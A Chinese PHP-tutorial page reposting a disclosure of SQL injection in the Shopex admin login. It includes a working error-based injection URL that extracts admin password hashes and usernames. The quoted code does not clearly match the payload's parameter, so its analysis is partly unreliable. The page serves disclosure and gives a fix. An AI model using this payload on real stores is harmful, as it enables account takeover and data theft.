网站地图    收藏   

主页 > 后端 > 网站安全 >

Shopex后台登录页面某参数存在注入及修复 - 网站

来源:自学PHP网    时间:2015-04-17 10:16 作者: 阅读:

[导读] 对登录时传递的某参数未做过滤,导致注入的产生最近做二次开发的时候看到了登录的流程发现在文件 shopex core admin controller ctl passport php处理了验证码,管理帐号和密码,但是在最底下...

对登录时传递的某参数未做过滤,导致注入的产生
最近做二次开发的时候看到了登录的流程
 
发现在文件\shopex\core\admin\controller\ctl.passport.php
 
处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id
function certi_validate(){
        $cert = $this->system->loadModel('service/certificate');
        $sess_id = $_POST['session_id'];

        $return = array();
        if($sess_id == $cert->get_sess()){
            $return = array(
                'res' => 'succ',
                'msg' => '',
                'info' => ''
            );

            echo json_encode($return);
        }else{
            $return = array(
                'res' => 'fail',
                'msg' => '000001',
                'info' => 'You have the different session!'
            );

            echo json_encode($return);
        }
    }

 

没做处理。直接导致sql注入产生。还在学php,分析错的地方请指正 

http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1
http://fuck.0day5.com/shopadmin/index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1
 
顺带路径一起爆出来了
 
 

修复方案:

过滤,官方已经升级修复,请用户及时升级
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论